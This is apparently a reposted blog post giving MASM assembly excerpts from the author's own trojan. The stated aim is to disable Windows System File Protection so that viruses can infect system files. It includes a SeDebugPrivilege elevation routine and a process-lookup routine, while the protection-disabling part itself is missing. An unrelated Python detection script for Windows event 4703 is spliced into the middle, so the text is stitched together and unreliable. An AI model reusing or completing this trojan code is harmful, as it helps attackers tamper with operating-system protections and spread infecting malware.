Assembly code to close system file protection

Posted by xiaoxiao, 2021-03-06

When writing viruses or Trojans that infect system files, "System File Protection" always seems to get in the way, so here is an assembly example of turning System File Protection off [taken from my own "Ice Horse" trojan]. I hope it is of some help to newcomers to Win32 assembly like me!

[Please keep this source note when reposting]

Author: Ice Fox Prodigal Son [http://www.icyfoxlovelace.com]

The code is divided into four parts, one file each: the example program, "Elevate privileges .asm", "Find process .asm" and "Close file protection .asm".

Turn off system file protection example .asm

.386
.model flat, stdcall
option casemap:none
; -----------------------------------------------------------------
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include advapi32.inc
includelib advapi32.lib

.code
; -----------------------------------------------------------------
; Ice Fox Prodigal Son, work code excerpt
include CloseFileProtection.asm     ; the "Close file protection .asm" part

FSB db "Unable to turn off file protection!", 0

; ... (the call that turns file protection off and the success branch of the
; .if are not shown; only the failure branch remains)
    ; invoke MessageBox, ..., MB_OK
.else
    invoke MessageBox, NULL, offset FSB, offset FSB, MB_OK
.endif
ret
; -----------------------------------------------------------------

Elevate privileges .asm

; Elevate privileges: obtain the right to insert code into system processes
; Ice Fox Prodigal Son, work code excerpt
; include advapi32.inc
; includelib advapi32.lib

SE_DEBUG_NAME_Y db "SeDebugPrivilege", 0

_EnableDebugPrivilege proc
    local @hToken
    local @tp:TOKEN_PRIVILEGES

    invoke GetCurrentProcess
    lea ecx, @hToken
    invoke OpenProcessToken, eax, TOKEN_ADJUST_PRIVILEGES, ecx   ; ecx = addr @hToken
    mov @tp.PrivilegeCount, 1
    invoke LookupPrivilegeValue, NULL, addr SE_DEBUG_NAME_Y, addr @tp.Privileges[0].Luid
    mov @tp.Privileges[0].Attributes, SE_PRIVILEGE_ENABLED
    invoke AdjustTokenPrivileges, @hToken, FALSE, addr @tp, sizeof @tp, NULL, NULL
    ; Note: AdjustTokenPrivileges returns non-zero even when the privilege is not
    ; held by the token (GetLastError then gives ERROR_NOT_ALL_ASSIGNED), so a
    ; non-zero EAX alone does not prove SeDebugPrivilege was enabled.
    push eax
    invoke CloseHandle, @hToken
    pop eax
    ret
_EnableDebugPrivilege endp

Find process .asm
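The privilege routine above calls AdjustTokenPrivileges to switch SeDebugPrivilege on, which is exactly the action a defender can watch for: Windows 10 / Server 2016 and later log it as Security event 4703 ("A user right was adjusted"), naming the process image and the enabled privilege. The following is an added example, not code from the article, that runs a simple detection over constructed 4703-style records: the record layout (Key=Value pairs on one line) and the allow-list of images are assumptions for illustration, not a real export format.

```python
"""Flag SeDebugPrivilege being enabled by a process outside a small allow-list.

Added example (not part of the original article). It scans constructed Windows
Security records shaped after event 4703 ("A user right was adjusted"), which is
recorded when AdjustTokenPrivileges enables a privilege. The one-line Key=Value
layout and the allow-list below are assumptions made for this example.
"""
import re
from dataclasses import dataclass

# Constructed sample records, flattened to one line each.
SAMPLE_LOG = [
    "EventID=4703 ProcessName=C:\\Windows\\System32\\svchost.exe SubjectUserName=SYSTEM "
    "EnabledPrivilegeList=SeDebugPrivilege DisabledPrivilegeList=-",
    "EventID=4703 ProcessName=C:\\Users\\bob\\AppData\\Local\\Temp\\update.exe SubjectUserName=bob "
    "EnabledPrivilegeList=SeDebugPrivilege DisabledPrivilegeList=-",
    "EventID=4703 ProcessName=C:\\Users\\bob\\tool.exe SubjectUserName=bob "
    "EnabledPrivilegeList=SeBackupPrivilege DisabledPrivilegeList=-",
    "EventID=4688 ProcessName=C:\\Windows\\explorer.exe SubjectUserName=bob",
]

# Placeholder allow-list of images that are expected to enable SeDebugPrivilege
# (service host, debuggers, endpoint agents); tune it to the environment.
ALLOWED_DEBUG_IMAGES = {
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\lsass.exe",
}

FIELD_RE = re.compile(r"(\w+)=(\S+)")


@dataclass(frozen=True)
class Finding:
    user: str
    image: str


def parse_record(line):
    """Turn 'Key=Value Key=Value ...' into a dict (values here contain no spaces)."""
    return dict(FIELD_RE.findall(line))


def find_sedebug_enables(lines, allowed=ALLOWED_DEBUG_IMAGES):
    """Return a Finding for every 4703 record that enables SeDebugPrivilege
    from an image that is not on the allow-list."""
    findings = []
    for line in lines:
        rec = parse_record(line)
        if rec.get("EventID") != "4703":
            continue
        # The privilege list may name several privileges separated by commas.
        enabled = rec.get("EnabledPrivilegeList", "-").split(",")
        if "SeDebugPrivilege" not in enabled:
            continue
        image = rec.get("ProcessName", "").lower()
        if image in allowed:
            continue
        findings.append(Finding(user=rec.get("SubjectUserName", "?"), image=image))
    return findings


if __name__ == "__main__":
    for f in find_sedebug_enables(SAMPLE_LOG):
        print(f"ALERT: {f.user} enabled SeDebugPrivilege in {f.image}")
```

On the constructed input only the copy of update.exe running from a user's Temp directory is reported; the svchost.exe record is suppressed by the allow-list and the SeBackupPrivilege record is ignored. In practice 4703 is noisy, so the allow-list (or a baseline of images per host) is what makes the rule usable.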

; Find a process ID by program name
; Ice Fox Prodigal Son, work code excerpt
; include kernel32.inc
; includelib kernel32.lib
;
; Example (the routine upper-cases the snapshot entry before comparing, so the
; name passed in must be upper case for the match to succeed):
;   ProcessName db "Explorer.exe", 0
;   ...........
;   invoke _FindProcess, addr ProcessName
;   .if eax
;       ; found
;   .else
;       ; not found
;   .endif
; -----------------------------------------------------------------

; Zero a block of memory
_ZeroMemory proc _lpDest, _dwSize
    push edi
    cld
    ; push _lpDest
    mov edi, _lpDest
    mov ecx, _dwSize
    xor eax, eax
    rep stosb
    ; pop eax
    pop edi
    ret
_ZeroMemory endp

; Calculate the length of a string (including the terminating 0)
_lstrlen proc _lpString
    push edi
    cld
    mov edi, _lpString
    mov ecx, -1
    xor al, al
    repnz scasb
    mov eax, edi
    sub eax, _lpString
    pop edi
    ret
_lstrlen endp

; -----------------------------------------------------------------
; _FindProcess
;   in:  @ProcessName = address of the upper-case process name string
;   out: EAX = process ID (EAX = 0: not found)
; -----------------------------------------------------------------
_FindProcess proc uses esi edi @ProcessName
    local @StringLength             ; length of the string @ProcessName points to
    local @hSnapShot                ; handle used to walk the process list
    local @stProcess:PROCESSENTRY32

    ; Calculate the length of the incoming process name (including the trailing 0)
    invoke _lstrlen, @ProcessName
    mov @StringLength, eax
    invoke _ZeroMemory, addr @stProcess, sizeof @stProcess
    mov @stProcess.dwSize, sizeof @stProcess
    invoke CreateToolhelp32Snapshot, TH32CS_SNAPPROCESS, 0
    mov @hSnapShot, eax
    invoke Process32First, @hSnapShot, addr @stProcess
    .while eax
        lea esi, @stProcess.szExeFile
        push esi                    ; save the start of the file name
        mov edi, esi
        ; Convert to upper case, in place
_nextz:
        lodsb
        cmp al, "a"
        jb @F
        cmp al, "z"
        ja @F
        and al, not 20h
@@:
        stosb
        cmp al, "\"
        jnz @F
        pop ecx                     ; saved ESI is useless: the name starts after this "\"
        push esi
@@:
        or al, al
        jnz _nextz
        ; String comparison (including the trailing 0)
        mov ecx, @StringLength
        pop esi
        mov edi, @ProcessName
        repz cmpsb
        .if ZERO?
            ; Process with the same name found (ZF = 1)
            mov eax, @stProcess.th32ProcessID
            .break
        .endif
        invoke Process32Next, @hSnapShot, addr @stProcess
    .endw
    ; EAX is the process ID if found, otherwise 0; close the snapshot on both paths
    push eax
    invoke CloseHandle, @hSnapShot
    pop eax
    ret
_FindProcess endp

Close file protection .asm

(The contents of this part are not reproduced on this page.)

Please credit the original address when reposting: https://www.9cbs.com/read-89705.html
